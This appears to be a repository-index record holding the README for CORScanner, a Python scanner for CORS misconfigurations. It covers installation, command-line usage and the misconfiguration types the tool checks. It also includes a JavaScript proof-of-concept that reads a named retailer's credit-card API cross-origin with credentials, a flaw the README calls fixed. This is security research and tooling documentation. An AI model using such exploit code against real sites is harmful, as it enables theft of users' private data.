{"id":13625940,"url":"https://github.com/chenjj/CORScanner","last_synced_at":"2025-04-16T11:30:57.485Z","repository":{"id":38237978,"uuid":"132311222","full_name":"chenjj/CORScanner","owner":"chenjj","description":"🎯 Fast CORS misconfiguration vulnerabilities scanner","archived":false,"fork":false,"pushed_at":"2021-11-25T07:25:11.000Z","size":2809,"stargazers_count":1076,"open_issues_count":1,"forks_count":182,"subscribers_count":20,"default_branch":"master","last_synced_at":"2025-04-14T08:13:35.424Z","etag":null,"topics":["cors","cors-misconfigurations","cors-policy","cors-scanner","python","python3","vulnerability-scanners","web-security"],"latest_commit_sha":null,"homepage":"https://pypi.org/project/cors/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/chenjj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-05-06T05:57:09.000Z","updated_at":"2025-04-12T00:19:02.000Z","dependencies_parsed_at":"2022-07-12T01:30:58.015Z","dependency_job_id":null,"html_url":"https://github.com/chenjj/CORScanner","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chenjj%2FCORScanner","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chenjj%2FCORScanner/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chenjj%2FCORScanner/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chenjj%2FCORScanner/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/chenjj","download_url":"https://codeload.github.com/chenjj/CORScanner/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249235030,"owners_count":21235131,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cors","cors-misconfigurations","cors-policy","cors-scanner","python","python3","vulnerability-scanners","web-security"],"created_at":"2024-08-01T21:02:06.195Z","updated_at":"2025-04-16T11:30:57.446Z","avatar_url":"https://github.com/chenjj.png","language":"Python","readme":"## About CORScanner \n\nCORScanner is a python tool designed to discover CORS misconfigurations vulnerabilities of websites. It helps website administrators and penetration testers to check whether the domains/urls they are targeting have insecure CORS policies. \n\n### Features\n* **Fast**. It uses [gevent](https://github.com/gevent/gevent) instead of Python threads for concurrency, which is much faster for network scanning.\n* **Comprehensive**. It covers all [the common types of CORS misconfigurations](#misconfiguration-types) we know.\n* **Flexible**. It supports various self-define features (e.g. file output), which is helpful for large-scale scanning.\n* 🆕 CORScanner supports installation via pip (`pip install corscanner` or `pip install cors`)\n* 🆕 CORScanner can be used as a library in your project.\n\nTwo useful references for understanding CORS systematically: \n* USENIX security 18 paper: [We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS](https://www.jianjunchen.com/p/CORS-USESEC18.pdf)\n* 中文详解：[绕过浏览器SOP，跨站窃取信息：CORS配置安全漏洞报告及最佳部署实践](https://www.jianjunchen.com/post/cors%E5%AE%89%E5%85%A8%E9%83%A8%E7%BD%B2%E6%9C%80%E4%BD%B3%E5%AE%9E%E8%B7%B5/)\n\n\n\u003cdetails\u003e\u003csummary\u003ePlease consider citing our paper if you do scentific research (Click me).  \u003c/summary\u003e\n\u003cp\u003e\n\n*Latex version:*\n\n```tex\n@inproceedings{chen-cors,\nauthor = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang},\ntitle = {We Still Don{\\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}},\nbooktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},\nyear = {2018},\nisbn = {978-1-939133-04-5},\naddress = {Baltimore, MD},\npages = {1079--1093},\nurl = {https://www.usenix.org/conference/usenixsecurity18/presentation/chen-jianjun},\npublisher = {{USENIX} Association},\nmonth = aug,\n}\n```\n\n*Word version:*\n\nJianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. \"We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS.\" In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 2018.\n\n\u003c/p\u003e\n\u003c/details\u003e\n\n## Screenshots\n\n![CORScanner](https://github.com/chenjj/CORScanner/raw/master/images/screenshot.png \"CORScanner in action\")\n\n## Installation\n\n- Download this tool\n```\ngit clone https://github.com/chenjj/CORScanner.git\n```\n\n- Install dependencies\n```\nsudo pip install -r requirements.txt\n```\nCORScanner depends on the `requests`, `gevent`, `tldextract`, `colorama` and `argparse` python modules.\n\n## Python Version:\n\n* Both Python 2 (**2.7.x**) and Python 3 (**3.7.x**) are supported.\n\n## CORScanner as a library\n\n- Install CORScanner via pip\n\n```\nsudo pip install corscanner\n```\n\nor use the short name: \n\n```\nsudo pip install cors\n```\n\n- Example code:\n```python\n\u003e\u003e\u003e from CORScanner.cors_scan import cors_check\n\u003e\u003e\u003e ret = cors_check(\"https://www.instagram.com\", None)\n\u003e\u003e\u003e ret\n{'url': 'https://www.instagram.com', 'type': 'reflect_origin', 'credentials': 'false', 'origin': 'https://evil.com', 'status_code': 200}\n```\n\nYou can also use CORScanner via the `corscanner` or `cors` command: `cors -vu https://www.instagram.com`\n\n## Usage\n\nShort Form    | Long Form     | Description\n------------- | ------------- |-------------\n-u            | --url         | URL/domain to check it's CORS policy\n-d            | --headers     | Add headers to the request\n-i            | --input       | URL/domain list file to check their CORS policy\n-t            | --threads     | Number of threads to use for CORS scan\n-o            | --output      | Save the results to json file\n-v            | --verbose     | Enable the verbose mode and display results in realtime\n-T            | --timeout     | Set requests timeout (default 10 sec)\n-p            | --proxy       | Enable proxy (http or socks5)\n-h            | --help        | show the help message and exit\n\n### Examples\n\n* To check CORS misconfigurations of specific domain:\n\n``python cors_scan.py -u example.com``\n\n* To enable more debug info, use -v:\n\n``python cors_scan.py -u example.com -v``\n\n* To save scan results to a JSON file, use -o:\n\n``python cors_scan.py -u example.com -o output_filename``\n\n* To check CORS misconfigurations of specific URL:\n\n``python cors_scan.py -u http://example.com/restapi``\n\n* To check CORS misconfiguration with specific headers:\n\n``python cors_scan.py -u example.com -d \"Cookie: test\"``\n\n* To check CORS misconfigurations of multiple domains/URLs:\n\n``python cors_scan.py -i top_100_domains.txt -t 100``\n\n* To enable proxy for CORScanner, use -p\n\n```python cors_scan.py -u example.com -p http://127.0.0.1:8080```\n\nTo use socks5 proxy, install PySocks with `pip install PySocks`\n\n```python cors_scan.py -u example.com -p socks5://127.0.0.1:8080```\n\n* To list all the basic options and switches use -h switch:\n\n```python cors_scan.py -h```\n\n## Misconfiguration types\nThis tool covers the following misconfiguration types:\n\nMisconfiguration type    | Description\n------------------------ | --------------------------\nReflect_any_origin       | Blindly reflect the Origin header value in `Access-Control-Allow-Origin headers` in responses, which means any website can read its secrets by sending cross-orign requests.\nPrefix_match             | `wwww.example.com` trusts `example.com.evil.com`, which is an attacker's domain.\nSuffix_match             | `wwww.example.com` trusts `evilexample.com`, which could be registered by an attacker.\nNot_escape_dot           | `wwww.example.com` trusts `wwwaexample.com`, which could be registered by an attacker.\nSubstring match          | `wwww.example.com` trusts `example.co`, which could be registered by an attacker.\nTrust_null               | `wwww.example.com` trusts `null`, which can be forged by iframe sandbox scripts\nHTTPS_trust_HTTP         | Risky trust dependency, a MITM attacker may steal HTTPS site secrets\nTrust_any_subdomain      | Risky trust dependency, a subdomain XSS may steal its secrets\nCustom_third_parties     | Custom unsafe third parties origins like `github.io`, see more in [origins.json](./origins.json) file. Thanks [@phackt](https://github.com/phackt)!\nSpecial_characters_bypass| Exploiting browsers’ handling of special characters. Most can only work in Safari except `_`, which can also work in Chrome and Firefox. See more in [Advanced CORS Exploitation Techniques](https://www.corben.io/advanced-cors-techniques/). Thanks [@Malayke](https://github.com/Malayke).\n  \nWelcome to contribute more.  \n  \n## Exploitation examples\nHere is an example about how to exploit \"Reflect_any_origin\" misconfiguration on Walmart.com(fixed). Localhost is the malicious website in the video.\n\nWalmart.com video on Youtube:\n\n[![Walmart_CORS_misconfiguration_exploitation](https://github.com/chenjj/CORScanner/raw/master/images/walmart.png)](http://www.youtube.com/watch?v=3abaevsSHXY)\n\nHere is the exploitation code:\n```javascript\n\u003cscript\u003e\n    // Send a cross origin request to the walmart.com server, when a victim visits the page.\n    var req = new XMLHttpRequest();\n    req.open('GET',\"https://www.walmart.com/account/electrode/account/api/customer/:CID/credit-card\",true);\n    req.onload = stealData;\n    req.withCredentials = true;\n    req.send();\n\n    function stealData(){\n        //reading response is allowed because of the CORS misconfiguration.\n        var data= JSON.stringify(JSON.parse(this.responseText),null,2);\n\n        //display the data on the page. A real attacker can send the data to his server.\n        output(data);\n    }\n\n    function output(inp) {\n        document.body.appendChild(document.createElement('pre')).innerHTML = inp;\n    }\n\u003c/script\u003e\n```\n\nIf you have understood how the demo works, you can read Section 5 and Section 6 of the [CORS paper](https://www.jianjunchen.com/publication/an-empirical-study-of-cors/) and know how to exploit other misconfigurations.\n\n## License\n\nCORScanner is licensed under the MIT license. take a look at the [LICENSE](./LICENSE) for more information.\n\n\n## Credits\nThis work is inspired by the following excellent researches:\n\n* James Kettle, “Exploiting CORS misconfigurations for Bitcoins and bounties”, AppSecUSA 2016*\n* Evan Johnson, “Misconfigured CORS and why web appsec is not getting easier”,  AppSecUSA 2016*\n* Von Jens Müller, \"CORS misconfigurations on a large scale\", [CORStest](https://github.com/RUB-NDS/CORStest)*\n\n","funding_links":[],"categories":["Tools","Python (1887)","Python","漏洞扫描"],"sub_categories":["Scanner"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchenjj%2FCORScanner","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchenjj%2FCORScanner","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchenjj%2FCORScanner/lists"}